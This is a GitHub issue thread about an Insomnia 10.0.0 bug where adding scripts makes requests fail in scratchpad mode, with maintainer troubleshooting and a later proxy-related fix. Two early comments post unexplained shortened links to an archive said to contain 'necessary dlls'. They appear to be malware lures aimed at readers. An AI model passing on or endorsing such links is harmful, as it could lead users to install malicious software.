### ISSUE TITLE
Adding a script causes unexpected request failure

### ISSUE THREAD

**Issue by ftiercelin** [getinsomnia/insomnia#7976]
### Expected Behavior

In scratchpad mode, I created a request that does a GET on https://www.google.com
I ran the request successfully.
I then added an after-response script that does:
`console.log("hello!");`

### Actual Behavior

after adding the script, the request consistently fails with error:
`Execute after-response script failed: TypeError: Cannot convert undefined or null to object`
![insomnia_script_error_msg](https://github.com/user-attachments/assets/2891e99c-df60-48f9-a859-5e255e754e06)

### Reproduction Steps
in scratchpad mode:
1. create a new HTTP request doing a GET to https://www.google.com
2. add a script (e.g. `console.log("hello");` )
3. execute script
![insomnia_script_error](https://github.com/user-attachments/assets/6e0ccc94-4126-404b-95c4-37cd4ae04b20)

### Is there an existing issue for this?

- [X] I have searched the [issue tracker](https://www.github.com/Kong/insomnia/issues) for this problem.

### Additional Information

Version: Insomnia 10.0.0
Build date: 9/9/2024
OS: Windows_NT x64 10.0.19045
Electron: 31.4.0
Node: 20.16.0
Node ABI: 125
V8: 12.6.228.30-electron.0
Architecture: x64

### Insomnia Version

10.0.0

### What operating system are you using?

Windows

### Operating System Version

Windows_NT x64 10.0.19045

### Installation method

insomnia automated update

### Last Known Working Insomnia version

n/a

**Comment by AmjedKhaled165** [comment]
try this
https://bit.ly/4gwC82r
I put the necessary dlls in the archive

**Comment by 102898Is** [comment]
try this

https://bit.ly/4eugCty

you may need to install the c compiler

**Comment by subnetmarco** [comment]
@ihexxa

**Comment by ftiercelin** [comment]
forgot to mention that I'm only seeing this in scratchpad mode - not seeing this in "normal" mode

**Comment by ihexxa** [comment]
This is weird, I can't reproduce, probably I missed something.
Is there any folder-level script? 
Could you check this:
1. Go to "help" menu, click "show/hide hidden window"
2. Click the hidden window, go to top menu "view" -> "toggle devTools"
3. Send the problematic request
4. see is there any error in the devTool -> Console Tab (see screenshot 2)

Thank you for the detailed report.

<img width="1727" alt="Screenshot 2024-09-20 at 15 26 35" src="https://github.com/user-attachments/assets/13b4032a-4f3c-48e8-a459-bb15bc1e260f">

<img width="846" alt="image" src="https://github.com/user-attachments/assets/8a769ff0-74fa-4f8f-80ae-b794395a085b">

**Comment by ftiercelin** [comment]
Thanks @ihexxa for looking into this,
I tried the help menu but could not locate the show/hide option you were referring to:
![insomnia_help_menu_scratchpad](https://github.com/user-attachments/assets/6d6f6c06-dce8-4c8e-ae5b-0e778deef34d)

I ran again the query (which failed for the same reason), here are the console logs:
[insomnia_console_scratchpad.txt](https://github.com/user-attachments/files/17071775/insomnia_console_scratchpad.txt)

I looked in the folder, no script:

![insomnia_folder_scratchpad](https://github.com/user-attachments/assets/e89a22af-c2ab-444e-a116-a341dbfb2afd)

might be worth mentioning that:
1. I used google here as an example, the behaviour applies to any url I tried
2. we're behind a Zscaler proxy (don't think that could play a role, but...)

**Comment by ihexxa** [comment]
I tried to enable the proxy in the scratchpad mode still not able to reproduce it. I may improve the error message to help identify it in the next.

**Comment by ftiercelin** [comment]
Thanks @ihexxa, I'll retry when the next version is pushed out.

**Comment by ihexxa** [comment]
Hello @ftiercelin , would you mind to update to 10.1, which provides more information and could be helpful for us to identify the issue.

**Comment by ftiercelin** [comment]
Hi @ihexxa , I upgraded to 10.0.1, logout, started scratchpad mode.
I can't provide you logs of the failure, because, well.... it's not failing anymore 👍 
I have added a pre script (in addition to the existing after script), still works fine.

**Comment by ftiercelin** [comment]
no longer failing after upgrading to 10.0.1

**Comment by FunkySamuel37** [comment]
<img width="661" alt="image" src="https://github.com/user-attachments/assets/7392d9be-2142-4c4b-a9ba-73c74bddaef2">

I ran into a similar issue. When there's content in the pre-script, the HTTP proxy turns into NaN.

**Comment by ihexxa** [comment]
Thanks @FunkySamuel37, it's revealing, let me check.

**Comment by ihexxa** [comment]
@FunkySamuel37 The fix will be included in the next minor release 10.2, which might be released this or next week.
Currently you might be able to add proxy url without the protocol "http" as the work around.
